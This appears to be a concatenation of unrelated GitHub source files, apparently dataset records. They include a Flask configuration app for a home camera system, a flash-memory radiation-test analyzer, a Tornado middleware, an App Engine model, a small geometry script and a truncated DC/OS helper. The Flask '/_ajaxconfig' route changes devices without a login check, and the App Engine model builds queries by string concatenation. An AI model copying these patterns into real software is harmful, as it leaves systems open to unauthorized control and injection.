render_template('config.html', basicform=basicform, telegramform=telegramform, mailform=mailform,\n ftpform=ftpform, smsform=smsform, aiform=aiform, photoform=photoform,\n camerasform=camerasform, tabchoice=tabchoice, remoteform=remoteform, chatedit=\"empty\")\n # ai\n elif (aiform.save_a.data):\n if aiform.validate_on_submit():\n save_and_prepare_forms(DB, aiform, formlist)\n else:\n flash_errors(aiform)\n save_and_prepare_forms(DB, None, formlist)\n tabchoice = \"ai\"\n return render_template('config.html', basicform=basicform, telegramform=telegramform, mailform=mailform,\n ftpform=ftpform, smsform=smsform, aiform=aiform, photoform=photoform,\n camerasform=camerasform, tabchoice=tabchoice, remoteform=remoteform, chatedit=\"empty\")\n else:\n replist = []\n return render_template(\"index.html\")\n\n\n@app.route(\"/_ajaxconfig\", methods=[\"GET\", \"POST\"])\ndef _ajaxconfig():\n global DB\n global PUSHT\n global HUE\n cmd = request.args.get(\"cmd\")\n index = request.args.get(\"index\", 0, type=int)\n if cmd == \"delete\":\n chatidlist = DB.db_query(\"telegram\", \"chatidlist\")\n if index >= 0 and index <= len(chatidlist)-1:\n del chatidlist[index]\n DB.db_update(\"telegram\", \"chatidlist\", chatidlist)\n telegramform = models.TelegramForm(request.form)\n telegramform.copyajaxdata(DB)\n telegramform.populateform(DB)\n result0 = render_template(\"config_chatid.html\", telegramform=telegramform)\n elif cmd == \"edit\":\n chatidlist = DB.db_query(\"telegram\", \"chatidlist\")\n telegramform = models.TelegramForm(request.form)\n telegramform.copyajaxdata(DB)\n telegramform.populateform(DB)\n telegramform.chatid_id.data = chatidlist[index]\n telegramform.chatedit_index.data = index\n result0 = render_template(\"config_chatedit.html\", telegramform=telegramform, chatedit=str(index+1))\n elif cmd == \"camedit\":\n camerasform = models.CamerasForm(request.form)\n camerasform.copyajaxdata(DB)\n camerasform.act_camera_id.data, _, _ = camerasform.cameralist[index]\n camerasform.populateform(DB)\n result0 = render_template(\"config_camedit.html\", camerasform=camerasform, camedit_action=\"edit\",\n cid=camerasform.act_camera_id.data)\n elif cmd == \"camdelete\":\n camerasform = models.CamerasForm(request.form)\n camerasform.copyajaxdata(DB)\n camerasform.act_camera_id.data, _, _ = camerasform.cameralist[index]\n id0 = ObjectId(camerasform.act_camera_id.data)\n DB.db_delete_one(\"cameras\", \"_id\", id0)\n camerasform.act_camera_id.data = \"-1\"\n camerasform.copyajaxdata(DB)\n result0 = render_template(\"config_cameraid.html\", camerasform=camerasform)\n elif cmd == \"camcheck\":\n check = request.args.get(\"check\", 0, type=str)\n checkbol = True if check == \"true\" else False\n camerasform = models.CamerasForm(request.form)\n camerasform.copyajaxdata(DB)\n camerasform.act_camera_id.data, _, _ = camerasform.cameralist[index]\n id0 = ObjectId(camerasform.act_camera_id.data)\n DB.db_update2(\"cameras\", \"_id\", id0, \"enable\", checkbol)\n camerasform.act_camera_id.data = \"-1\"\n camerasform.copyajaxdata(DB)\n result0 = render_template(\"config_cameraid.html\", camerasform=camerasform)\n elif cmd == \"camadd\":\n # insert code here\n camerasform = models.CamerasForm(request.form)\n camerasform.populate_with_defaults(DB)\n result0 = render_template(\"config_camedit.html\", camerasform=camerasform, camedit_action=\"add\")\n elif cmd == \"runtime_tgmode on\" or cmd == \"runtime_gettgmode\" or cmd == \"runtime_tgmode off\":\n GUCK_PATH = DB.db_query(\"remote\", \"guck_path\")\n REMOTE_HOST = 
DB.db_query(\"remote\", \"remote_host\")\n REMOTE_HOST_SHORT = DB.db_query(\"remote\", \"remote_host_short\")\n REMOTE_PORT = DB.db_query(\"remote\", \"remote_port\")\n REMOTE_SSH_PORT = DB.db_query(\"remote\", \"remote_ssh_port\")\n REMOTE_HOST_MAC = DB.db_query(\"remote\", \"remote_host_mac\")\n INTERFACE = DB.db_query(\"remote\", \"interface\")\n REMOTE_VIRTUALENV = DB.db_query(\"remote\", \"remote_virtualenv\")\n ZENZL = zenzlib.ZenzLib(REMOTE_HOST, REMOTE_HOST_MAC, INTERFACE, REMOTE_PORT, REMOTE_HOST_SHORT, REMOTE_SSH_PORT,\n GUCK_PATH, REMOTE_VIRTUALENV)\n if cmd == \"runtime_tgmode off\":\n sstr = \"tgmode silent\"\n elif cmd == \"runtime_tgmode on\":\n sstr = \"tgmode verbose\"\n else:\n sstr = \"gettgmode\"\n stat, res0 = ZENZL.request_to_guck(sstr, REMOTE_HOST, REMOTE_PORT)\n result0 = res0\n elif cmd == \"hue_getonoff\":\n return jsonify(result=get_hue_onoff(HUE))\n elif cmd == \"hue_on\":\n g = HUE.get_all_groups()\n HUE.set_groups_on(g)\n return jsonify(result=True)\n elif cmd == \"hue_off\":\n g = HUE.get_all_groups()\n HUE.set_groups_off(g)\n return jsonify(result=False)\n else:\n result0 = \"\"\n return jsonify(result=result0, status=PUSHT.guckstatus)\n\n\n@app.route(\"/configmsg\", methods=[\"GET\", \"POST\"])\n@flask_login.login_required\ndef configmsg():\n f = request.args.get(\"a\")\n print(f)\n return jsonify(feedback=f)\n\n\ndef get_sunrise_sunset():\n o = ephem.Observer()\n o.lat = DB.db_query(\"ephem\", \"lat\")\n o.long = DB.db_query(\"ephem\", \"long\")\n sun = ephem.Sun()\n sun.compute()\n sunset0 = ephem.localtime(o.next_setting(sun))\n sunrise0 = ephem.localtime(o.next_rising(sun))\n hh0 = str(sunset0.hour) if len(str(sunset0.hour)) > 1 else \"0\" + str(sunset0.hour)\n min0 = str(sunset0.minute) if len(str(sunset0.minute)) > 1 else \"0\" + str(sunset0.minute)\n hh1 = str(sunrise0.hour) if len(str(sunrise0.hour)) > 1 else \"0\" + str(sunrise0.hour)\n min1 = str(sunrise0.minute) if len(str(sunrise0.minute)) > 1 else \"0\" + str(sunrise0.minute)\n return hh0, min0, hh1, min1\n\n\ndef get_geo_timestr():\n hh0, min0, hh1, min1 = get_sunrise_sunset()\n return \"(\" + hh0 + \":\" + min0 + \"h - \" + hh1 + \":\" + min1 + \"h)\"\n\n\n@app.route(\"/location/\", methods=['GET', 'POST'])\n@flask_login.login_required\ndef location():\n global DB\n GUCK_PATH = DB.db_query(\"remote\", \"guck_path\")\n REMOTE_HOST = DB.db_query(\"remote\", \"remote_host\")\n REMOTE_HOST_SHORT = DB.db_query(\"remote\", \"remote_host_short\")\n REMOTE_PORT = DB.db_query(\"remote\", \"remote_port\")\n REMOTE_SSH_PORT = DB.db_query(\"remote\", \"remote_ssh_port\")\n REMOTE_HOST_MAC = DB.db_query(\"remote\", \"remote_host_mac\")\n INTERFACE = DB.db_query(\"remote\", \"interface\")\n REMOTE_VIRTUALENV = DB.db_query(\"remote\", \"remote_virtualenv\")\n ZENZL = zenzlib.ZenzLib(REMOTE_HOST, REMOTE_HOST_MAC, INTERFACE, REMOTE_PORT, REMOTE_HOST_SHORT, REMOTE_SSH_PORT,\n GUCK_PATH, REMOTE_VIRTUALENV)\n location_name = DB.db_query(\"ephem\", \"location\")\n location_long = DB.db_query(\"ephem\", \"long\")\n location_lat = DB.db_query(\"ephem\", \"lat\")\n hh0, min0, hh1, min1 = get_sunrise_sunset()\n sunset = hh0 + \":\" + min0 + \"h\"\n sunrise = hh1 + \":\" + min1 + \"h\"\n temp, hum = ZENZL.get_sens_temp()\n external_ips = ZENZL.get_external_ip()\n return render_template(\"location.html\", temp=round(temp, 1), hum=round(hum, 1), sunrise=sunrise, sunset=sunset,\n location_name=location_name, location_long=location_long, location_lat=location_lat,\n external_ips=external_ips)\n\n\n# @app.route(\"/hue//\", 
defaults={\"param1\": \"0\"}, methods=['GET', 'POST'])\n@app.route(\"/hue/\", defaults={\"selected_s\": \"0\"}, methods=['GET', 'POST'])\n@app.route(\"/hue//\", methods=['GET', 'POST'])\n@flask_login.login_required\ndef hue(selected_s=\"0\"):\n global HUE\n if request.method == \"GET\":\n scheduleform = models.ScheduleForm(request.form)\n # if called without parameter it's initial call, get schedule from DB\n if selected_s == \"0\":\n sel = \"1\"\n try:\n hue_sched = DB.db_query(\"hue\", \"schedule_type\")\n if len([hc for hc in DB.db_getall(\"hue\")]) == 0:\n DB.db_open_one(\"hue\", {\"schedule_type\": \"1\", \"startt\": \"19:00\", \"endt\": \"23:30\", \"duration\": 4, \"rshift\": 45,\n \"guckdur\": 15, \"onlynight\": False})\n sel = hue_sched\n except:\n sel = \"1\"\n if hue_sched == \"-1\":\n sel = \"1\"\n if sel == \"1\":\n HUE.delete_all_schedules()\n DB.db_update(\"hue\", \"schedule_type\", sel)\n scheduleform.populateform(DB)\n timestr = get_geo_timestr()\n return render_template(\"hue.html\", timestr=timestr, selected=sel, scheduleform=scheduleform, hue=get_hue_onoff(HUE))\n else:\n if selected_s == \"1\":\n HUE.delete_all_schedules()\n DB.db_update(\"hue\", \"schedule_type\", selected_s)\n scheduleform.populateform(DB)\n timestr = get_geo_timestr()\n return render_template(\"hue.html\", timestr=timestr, selected=str(selected_s), scheduleform=scheduleform,\n hue=get_hue_onoff(HUE))\n if request.method == \"POST\":\n scheduleform = models.ScheduleForm(request.form)\n sel = \"0\"\n if (scheduleform.submit_aw.data):\n if len([hc for hc in DB.db_getall(\"hue\")]) == 0:\n DB.db_open_one(\"hue\", {\"schedule_type\": \"2\", \"startt\": \"19:00\", \"endt\": \"23:30\", \"duration\": 4, \"rshift\": 45,\n \"guckdur\": 15, \"onlynight\": False})\n if not scheduleform.validate_on_submit():\n flash_errors(scheduleform)\n return render_template(\"hue.html\", selected=sel, scheduleform=scheduleform, hue=get_hue_onoff(HUE))\n # on GUCK alert\n if scheduleform.schedulenr.data == \"5\" and scheduleform.validate_on_submit():\n sel = scheduleform.schedulenr.data\n guckdur = int(scheduleform.on_guck_duration.data)\n onlynight = scheduleform.only_night.data\n DB.db_update(\"hue\", \"schedule_type\", sel)\n DB.db_update(\"hue\", \"guckdur\", guckdur)\n DB.db_update(\"hue\", \"onlynight\", onlynight)\n HUE.delete_all_schedules()\n gl = HUE.get_all_groups()\n HUE.set_groups_off(gl)\n\n # Random all week\n if scheduleform.schedulenr.data == \"4\" and scheduleform.validate_on_submit():\n sel = scheduleform.schedulenr.data\n startmins = int(scheduleform.starttime_hh.data)*60 + int(scheduleform.starttime_mm.data)\n dur = int(scheduleform.duration_hh.data)*60\n rsh = int(scheduleform.random_shift.data)\n DB.db_update(\"hue\", \"schedule_type\", sel)\n DB.db_update(\"hue\", \"startt\", scheduleform.starttime_hh.data + \":\" + scheduleform.starttime_mm.data)\n DB.db_update(\"hue\", \"endt\", scheduleform.endtime_hh.data + \":\" + scheduleform.endtime_mm.data)\n DB.db_update(\"hue\", \"duration\", int(scheduleform.duration_hh.data))\n DB.db_update(\"hue\", \"rshift\", int(scheduleform.random_shift.data))\n HUE.delete_all_schedules()\n gl = HUE.get_all_groups()\n HUE.set_groups_off(gl)\n for g0 in gl:\n HUE.set_weekly_random_schedules(g0, startmins, dur, rsh, rsh)\n\n # Fixed weekdays or allweek\n if scheduleform.schedulenr.data == \"2\" or scheduleform.schedulenr.data == \"3\":\n sel = scheduleform.schedulenr.data\n startmins = int(scheduleform.starttime_hh.data)*60 + int(scheduleform.starttime_mm.data)\n endmins = 
int(scheduleform.endtime_hh.data)*60 + int(scheduleform.endtime_mm.data)\n DB.db_update(\"hue\", \"schedule_type\", sel)\n DB.db_update(\"hue\", \"startt\", scheduleform.starttime_hh.data + \":\" + scheduleform.starttime_mm.data)\n DB.db_update(\"hue\", \"endt\", scheduleform.endtime_hh.data + \":\" + scheduleform.endtime_mm.data)\n HUE.delete_all_schedules()\n gl = HUE.get_all_groups()\n HUE.set_groups_off(gl)\n for g0 in gl:\n # Mon - Fri fixed\n if scheduleform.schedulenr.data == \"2\":\n HUE.set_schedule_weekdays(g0, startmins, True)\n HUE.set_schedule_weekdays(g0, endmins, False)\n # Mon - Sun Fixed\n elif scheduleform.schedulenr.data == \"3\":\n HUE.set_schedule_allweek(g0, startmins, True)\n HUE.set_schedule_allweek(g0, endmins, False)\n\n scheduleform.populateform(DB)\n timestr = get_geo_timestr()\n return render_template(\"hue.html\", timestr=timestr, selected=sel, scheduleform=scheduleform, hue=get_hue_onoff(HUE))\n\n\nif __name__ == \"__main__\":\n app.run(host=\"0.0.0.0\", port=5000, debug=False)\n","repo_name":"dermatty/GUCK","sub_path":"bin/wastl/wastl.py","file_name":"wastl.py","file_ext":"py","file_size_in_byte":48779,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"28964487154","text":"import json\n\nfrom tornado_project.common_utilities.log import logger_info\nfrom tornado_project.common_utilities.ws_base import WSMiddleware\nfrom ..middleware import WS_CONNECT_USER_INFOS as user_infos\n\n\nclass PingMiddleware(WSMiddleware):\n '''\n 用于处理 ping-pong 交互\n - open 初始化用户信息\n - message 处理用户内 pong 数据\n - close 删除用户相关数据\n '''\n\n def process_open(self, ws):\n # print('PingMiddleware - open')\n user_infos['PingMiddleware'][ws] = dict(\n count=0,\n ping=None,\n )\n # print(user_infos)\n\n def process_message(self, ws):\n # print('PingMiddleware - message')\n logger_info.info('Ping Middleware handle message')\n msg = json.loads(ws.message)\n user_dic = user_infos['PingMiddleware'].get(ws)\n # 若pong满足条件,即重置对应user_times\n if 'pong' in msg:\n if user_dic and user_dic['ping'] == msg['pong']:\n user_infos['PingMiddleware'][ws]['count'] = 0\n\n def process_close(self,ws, *args, **kwargs):\n # print('PingMiddleware - close')\n if user_infos['PingMiddleware'].get(ws):\n # 若非自然断开连接,则删除字典内信息\n user_infos['PingMiddleware'].pop(ws)\n","repo_name":"Lin-SiYu/tornado-asyncio-project","sub_path":"tornado_project/common_utilities/middleware/pingmiddle.py","file_name":"pingmiddle.py","file_ext":"py","file_size_in_byte":1304,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"38424404770","text":"import os\nimport sys\nimport shutil\nimport logging\nimport errno\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom collections import OrderedDict\n\nimport config\n\n# Flash info\nBLOCKS = 8192\nPAGES_IN_BLOCK = 64\nPAGE_BYTESIZE = 4096\nBYTES_IN_BLOCK = PAGES_IN_BLOCK*PAGE_BYTESIZE\n\n# Script options\nSAVE_TO_FILE = True\n\nclass FlashChecker(object):\n \"\"\"Class for checking the flash content readback\"\"\"\n def __init__(self, path, startblock, stopblock, first_byte_bug, is_inverted, name=\"block_{0}.dat\"):\n \"\"\"Init function\"\"\"\n self.path=None\n self.name=None\n self.startblock=None\n self.stopblock=None\n self.first_byte_bug = None\n self.is_inverted = None\n\n self.set_path(path)\n self.setup_logging()\n self.logger = logging.getLogger(\"FlashChecker\")\n self.set_name(name)\n self.set_blocks(startblock, stopblock)\n self.set_first_byte_bug(first_byte_bug)\n 
self.set_is_inverted(is_inverted)\n\n def set_path(self, path):\n assert os.path.isdir(path), \"{0} not existing\".format(path)\n self.path = path\n\n def set_name(self, name):\n self.name = name\n\n def set_blocks(self, startblock, stopblock):\n assert self.path is not None\n assert self.name is not None\n assert startblock <= stopblock\n assert stopblock < BLOCKS\n self.startblock = startblock\n self.stopblock = stopblock\n self.get_filepath(startblock)\n self.get_filepath(stopblock)\n\n def set_first_byte_bug(self, first_byte_bug):\n \"\"\"Set attribute first_byte_bug\n \"\"\"\n self.first_byte_bug = first_byte_bug\n\n def set_is_inverted(self, is_inverted):\n \"\"\"Set attribute is_inverted\n \"\"\"\n self.is_inverted = is_inverted\n\n def setup_logging(self):\n # Logging folder\n self.logdir = self.path + '/logs'\n try:\n if os.path.exists(self.logdir):\n shutil.rmtree(self.logdir)\n os.makedirs(self.logdir)\n except OSError as e:\n if e.errno != errno.EEXIST:\n raise\n # setup logging\n logger = logging.getLogger()\n logger.setLevel(logging.INFO)\n\n log_file = os.path.join(self.logdir, \"flash.log\")\n log_file_errors = os.path.join(self.logdir,\n \"flash_errors.log\")\n\n fh = logging.FileHandler(log_file)\n fh.setLevel(logging.INFO)\n\n fh2 = logging.FileHandler(log_file_errors)\n fh2.setLevel(logging.ERROR)\n\n ch = logging.StreamHandler()\n ch.setLevel(logging.INFO)\n\n formatter = logging.Formatter(\n \"%(asctime)s - %(name)s - %(levelname)s - %(message)s\")\n\n fh.setFormatter(formatter)\n fh2.setFormatter(formatter)\n ch.setFormatter(formatter)\n\n logger.addHandler(fh)\n logger.addHandler(fh2)\n logger.addHandler(ch)\n\n def get_filepath(self, block):\n assert block in range(self.startblock, self.stopblock+1)\n path = self.path + '/' + self.name.format(block)\n assert os.path.exists(path), \"path {0} not existing\".format(path)\n return path\n\n def check_byte(self, byte, reference_byte):\n flip_1to0 = 0\n flip_0to1 = 0\n b_1count = bin(byte).count('1')\n ref_1count = bin(reference_byte).count('1')\n if b_1count < ref_1count:\n flip_1to0 = ref_1count - b_1count\n elif b_1count > ref_1count:\n flip_0to1 = b_1count - ref_1count\n #if flip_0to1 > 1 or flip_0to1 > 1:\n # self.logger.info(\"byte: {0}, flip 1to0: {1}, flip_0to1: {2}:, 1s in byte {3}, 1s in ref {4}\".format(byte, flip_1to0, flip_0to1, b_1count, ref_1count))\n return flip_1to0, flip_0to1\n\n def analyse_block(self, block):\n \"\"\"\"\"\"\n filepath = self.get_filepath(block)\n with open(filepath, \"rb\") as f:\n byte = f.read(1)\n bytecount = 0\n byteerrors = 0\n pagenr = 0\n flip_1to0 = 0\n flip_0to1 = 0\n double_1to0 = 0\n double_0to1 = 0\n triple_plus_1to0 = 0\n triple_plus_0to1 = 0\n while byte:\n new_byte = byte\n byte = new_byte[0]\n # Do stuff with byte.\n if self.is_inverted:\n byte = ~byte & 0xFF\n reference_value = b'\\xa5'[0]\n if bytecount % PAGE_BYTESIZE == 0:\n pagenr += 1\n if self.first_byte_bug:\n reference_value = b'@'[0]\n if byte != reference_value:\n #print(\"{0:08b} {1:08b} \".format(my_byte, reference_value))\n byteerrors += 1\n f1to0, f0to1 = self.check_byte(byte, reference_value)\n flip_1to0 += f1to0\n if f1to0 == 2:\n double_1to0 += f1to0\n elif f1to0 > 2:\n triple_plus_1to0 += f1to0\n flip_0to1 += f0to1\n if f0to1 == 2:\n double_0to1 += f0to1\n elif f0to1 > 2:\n triple_plus_0to1 += f0to1\n self.logger.debug(\"Error on byte {0}: 0to1 {1} 1to0 {2} d_0to1 {3} d_1to0 {4} t+0to1 {5} t+1to0 {6} (Byte is {7})\".format(bytecount,\n flip_0to1,\n flip_1to0,\n double_0to1,\n double_1to0,\n 
triple_plus_0to1,\n triple_plus_1to0,\n byte))\n byte = f.read(1)\n bytecount += 1\n self.logger.info(\"Done analysing block {2}. byteerrors {1}.\\t0to1 {3}, 1to0 {4},\\td_0to1 {5} d_1to0 {6},\\tt+0to1 {7} t+1to0 {8}\".format(bytecount,\n byteerrors,\n block,\n flip_0to1,\n flip_1to0,\n double_0to1,\n double_1to0,\n triple_plus_0to1,\n triple_plus_1to0))\n if byteerrors == BYTES_IN_BLOCK:\n self.logger.error(\"Done analysing block {2}. byteerrors {1}.\\t0to1 {3}, 1to0 {4},\\td_0to1 {5} d_1to0 {6},\\tt+0to1 {7} t+1to0 {8}\".format(bytecount,\n byteerrors,\n block,\n flip_0to1,\n flip_1to0,\n double_0to1,\n double_1to0,\n triple_plus_0to1,\n triple_plus_1to0))\n assert bytecount == BYTES_IN_BLOCK, \"bytecount {0}, BYTES_IN_BLOCK {1} in block {2}\".format(bytecount, BYTES_IN_BLOCK, block)\n return {'byteerrors': byteerrors, 'flip_1to0': flip_1to0, 'flip_0to1': flip_0to1, 'double_1to0': double_1to0, 'double_0to1': double_0to1, 'triple_plus_1to0': triple_plus_1to0, 'triple_plus_0to1': triple_plus_0to1}\n\ndef get_xs(fluence, upsets, analysed_blocks):\n \"\"\"Returns the cross section for the given fluence and number of blocks analysed\n \"\"\"\n xs = upsets/(fluence*analysed_blocks*PAGES_IN_BLOCK*PAGE_BYTESIZE)\n return xs\n\ndef gen_hist(array, key, basepath):\n fig = plt.figure()\n ax = fig.add_subplot(111)\n hist = plt.hist(array, bins=500)\n ax.set_title(\"Histogram of {0} per block\".format(key))\n ax.set_xlabel(\"Number of {0} per block\".format(key))\n ax.set_ylabel(\"Occurrences\")\n if SAVE_TO_FILE:\n save_to_file(fig, key, basepath, '_hist')\n else:\n plt.show()\n return hist\n\ndef gen_plot(array, key, basepath, start_block=None):\n if start_block:\n block = list(range(start_block, start_block+len(array)))\n else:\n block = list(range(len(array)))\n fig = plt.figure()\n ax = fig.add_subplot(111)\n ax.semilogy(block, array)\n ax.set_xlabel(\"Block number\")\n ax.set_ylabel(\"{0} per block\".format(key))\n ax.set_title(\"{0} vs block number\".format(key))\n if SAVE_TO_FILE:\n save_to_file(fig, key, basepath)\n else:\n plt.show()\n\ndef save_to_file(plt, key, basepath, name_modifier=''):\n # creates folder if it does not exist\n plotdir = basepath + '/logs/plots/'\n try:\n os.makedirs(plotdir)\n except OSError as e:\n if e.errno != errno.EEXIST:\n raise\n # Saves plot to file\n filename = \"{0}{1}{2}.pdf\".format(plotdir, key, name_modifier)\n plt.savefig(filename, bbox_inches='tight')\n\ndef main(analysis):\n analysed_blocks = 0\n HIST_KEYS = ['flip_0to1']\n PLOT_KEYS = ['flip_0to1']\n keys_order = {'byteerrors': 0, 'flip_1to0': 1, 'flip_0to1': 2, 'double_1to0': 3, 'double_0to1': 4, 'triple_plus_1to0': 5, 'triple_plus_0to1': 6}\n result = {'byteerrors': 0, 'flip_1to0': 0, 'flip_0to1': 0, 'double_1to0': 0, 'double_0to1': 0, 'triple_plus_1to0': 0, 'triple_plus_0to1': 0}\n results_dict = {'byteerrors': [], 'flip_1to0': [], 'flip_0to1': [], 'double_1to0': [], 'double_0to1': [], 'triple_plus_1to0': [], 'triple_plus_0to1': []}\n results = {}\n fc = FlashChecker(path=analysis.basepath, startblock=analysis.startblock, stopblock=analysis.stopblock, first_byte_bug=analysis.first_byte_bug, is_inverted=analysis.is_inverted)\n for i in range(fc.startblock, fc.stopblock+1):\n if i not in analysis.exclude_blocks:\n analysed_blocks += 1\n results[i] = fc.analyse_block(i)\n for key in result.keys():\n result[key] += results[i][key]\n fc.logger.info(result)\n\n for key in results.keys():\n for res_key in results_dict.keys():\n results_dict[res_key].append(results[key][res_key])\n for key in 
results_dict.keys():\n if key in HIST_KEYS:\n hist = gen_hist(results_dict[key], key, analysis.basepath)\n if key in PLOT_KEYS:\n gen_plot(results_dict[key], key, analysis.basepath, analysis.startblock)\n mean = np.mean(results_dict[key])\n std = np.std(results_dict[key])\n fc.logger.info(\"value {0} \\tmean {1}\\tstd {2}\".format(key, mean, std))\n\n # calculates xs is fluence is available\n xs = OrderedDict()\n if analysis.fluence is not None:\n for fluence in analysis.fluence:\n upsets_0to1 = result['flip_0to1'] + result['double_0to1'] + result['triple_plus_0to1']\n upsets_1to0 = result['flip_1to0'] + result['double_1to0'] + result['triple_plus_1to0']\n upsets_tot = upsets_0to1 + upsets_1to0\n xs_avg = get_xs(fluence=fluence, upsets=upsets_tot,\n analysed_blocks=analysed_blocks)\n xs_0to1 = get_xs(fluence=fluence, upsets=upsets_0to1,\n analysed_blocks=analysed_blocks/2)\n xs_1to0 = get_xs(fluence=fluence, upsets=upsets_1to0,\n analysed_blocks=analysed_blocks/2)\n xs[fluence] = {'avg': xs_avg,\n '0to1':xs_0to1,\n '1to0':xs_1to0}\n fc.logger.info(\"xs for {0:.02e} is {1}\".format(fluence, xs[fluence]))\n return result, results, xs\n\nif __name__ == '__main__':\n\n if len(sys.argv) < 2 or len(sys.argv) > 3 :\n sys.exit(\"Usage \\\"python {0} key [basepath]\\\"\".format(sys.argv[0]))\n key = sys.argv[1]\n if key not in config.analysis.keys():\n sys.exit(\"Key {0} not in {1}\".format(key, config.analysis.keys()))\n analysis = config.analysis[key]\n if len(sys.argv) == 3:\n basepath = sys.argv[2]\n assert os.path.exists(basepath)\n analysis.set_basepath(basepath)\n\n main(analysis)\n","repo_name":"zongzeliunt/LANL_P25_RU_Felix_GUI","sub_path":"RU_GUI_release/py_gui/flash_analysis/flash_test.py","file_name":"flash_test.py","file_ext":"py","file_size_in_byte":14476,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"70201405882","text":"# -*- coding: UTF-8 -*-\nfrom google.appengine.ext import db\nimport datetime\n\nclass DatSime(db.Model):\n Hizuke = db.DateTimeProperty(auto_now_add=False) # 伝票日付\n Busyo = db.IntegerProperty() # 部署CD\n SimeNitizi = db.DateTimeProperty(auto_now_add=False) # 締め日時\n InsatuNitizi = db.DateTimeProperty(auto_now_add=False) # 印刷日時\n\n def GetRec(self,Hizuke,Busyo):\n Sql = \"SELECT * FROM \" + self.__class__.__name__\n Sql += \" Where Hizuke = DATE('\" + Hizuke.replace(\"/\",\"-\") + \"')\"\n Sql += \" And Busyo = \" + str(Busyo)\n Snap = db.GqlQuery(Sql)\n if Snap.count() == 0:\n Rec = DatSime()\n Rec.Hizuke = datetime.datetime.strptime(Hizuke, '%Y/%m/%d')\n Rec.Busyo = int(Busyo)\n else:\n Rec = Snap.fetch(1)[0]\n return Rec\n\n def GetKikan(self,Hizuke,Days): # 指定日数分取得\n \n EndHizuke = datetime.datetime.strptime(Hizuke,\"%Y/%m/%d\") + datetime.timedelta(days=Days)\n\n Sql = \"SELECT * FROM \" + self.__class__.__name__\n Sql += \" Where Hizuke >= DATE('\" + Hizuke.replace(\"/\",\"-\") + \"')\"\n Sql += \" And Hizuke <= DATE('\" + EndHizuke.strftime('%Y-%m-%d') + \"')\"\n Query = db.GqlQuery(Sql)\n return Query.fetch(Query.count())\n\n def AddRec(self,Rec):\n self.Delete(Rec.Hizuke,Rec.Busyo)\n Rec.put()\n return \n\n def SetSime(self,Hizuke,Busyo,MODE):\n Rec = self.GetRec(Hizuke,Busyo)\n if MODE == \"ON\":\n Rec.SimeNitizi = datetime.datetime.now() + datetime.timedelta(hours=9) \n Rec.put()\n else:\n Rec.delete()\n return 
\n","repo_name":"YuziSumoto/wakokaiitem","sub_path":"DatSime.py","file_name":"DatSime.py","file_ext":"py","file_size_in_byte":1602,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"831216300","text":"# Mencetak panjang, lebar, keliling, dan luas dari persegi panjang \n# walaupun hanya ada 2 data yang diketahui \n# dengan syarat salah satunya merupakan panjang atau lebar\n\n# Keliling = 2 * (panjang + lebar) -> K = 2 * (p + l)\n# Luas = panjang * lebar -> L = p * l\n\n# Contoh data : \n# panjang = 4\n# lebar = 3\n# keliling = 14\n# luas = 12\n\ndef hitungKeliling():\n # memeriksa apakah data sudah ada\n if (k != 0):\n return k\n # menghitung menggunakan rumus\n else:\n return 2 * (p + l)\n \ndef hitungLuas():\n # memeriksa apakah data sudah ada\n if (L != 0):\n return L\n # menghitung menggunakan rumus\n else:\n return p * l\n\ndef hitungPanjang():\n global p, l\n \n # jika yang diketahui lebar dan keliling\n if (l != 0 and k != 0):\n # 2 * (p + l) = k\n # p + l = k / 2\n p = k / 2 - l\n # jika yang diketahui lebar dan luas\n elif (l != 0 and L != 0):\n # L = p * l\n # p * l = L\n p = L / l\n\n return p\n\ndef hitungLebar():\n global p, l\n\n # jika yang diketahui panjang dan keliling\n if (p != 0 and k != 0):\n l = k / 2 - p\n # jika yang diketahui lebar dan luas\n elif (p != 0 and L != 0):\n l = L / p\n \n return l\n\ndef main():\n # variabel global\n global p, l, k, L\n\n # meminta input dari pengguna \n # masukkan 0 jika nilai tidak diketahui (nilai yang akan dicari)\n p = int(input(\"Panjang (masukkan 0 jika tidak diketahui): \"))\n l = int(input(\"Lebar (masukkan 0 jika tidak diketahui): \"))\n k = int(input(\"Keliling (masukkan 0 jika tidak diketahui): \"))\n L = int(input(\"Luas (masukkan 0 jika tidak diketahui): \"))\n\n # mencetak hasil\n print(\"Panjang:\", hitungPanjang())\n print(\"Lebar:\", hitungLebar())\n print(\"Keliling:\", hitungKeliling())\n print(\"Luas:\", hitungLuas())\n\nmain()","repo_name":"grassnjellyn/Techa-Tika","sub_path":"Math-One-For-All/PersegiPanjang.py","file_name":"PersegiPanjang.py","file_ext":"py","file_size_in_byte":1835,"program_lang":"python","lang":"id","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"1660968409","text":"\"\"\"\nTools for getting details from DC/OS installer artifacts.\n\"\"\"\n\nimport json\nimport shutil\nimport subprocess\nimport uuid\nfrom enum import Enum\nfrom pathlib import Path\nfrom tempfile import gettempdir\nfrom typing import Optional\n\n\nclass DCOSVariant(Enum):\n \"\"\"\n Variants of DC/OS.\n \"\"\"\n\n OSS = 1\n ENTERPRISE = 2\n\n\nclass _DCOSInstallerDetails:\n \"\"\"\n Details of a DC/OS installer.\n\n Attributes:\n variant: The DC/OS variant which can be installed by a particular\n installer.\n version: The version of DC/OS which can be installed by a particular\n installer.\n \"\"\"\n\n def __init__(self, variant: DCOSVariant, version: str) -> None:\n \"\"\"\n Details of a DC/OS installer.\n\n Args:\n variant: The DC/OS variant which can be installed by a particular\n installer.\n version: The version of DC/OS which can be installed by a\n particular installer.\n \"\"\"\n self.variant = variant\n self.version = version\n\n\ndef get_dcos_installer_details(\n installer: Path,\n workspace_dir: Optional[Path] = None,\n keep_extracted: bool = False,\n) -> _DCOSInstallerDetails:\n \"\"\"\n Get details from a DC/OS artifact.\n\n Args:\n installer: The path to a DC/OS installer. 
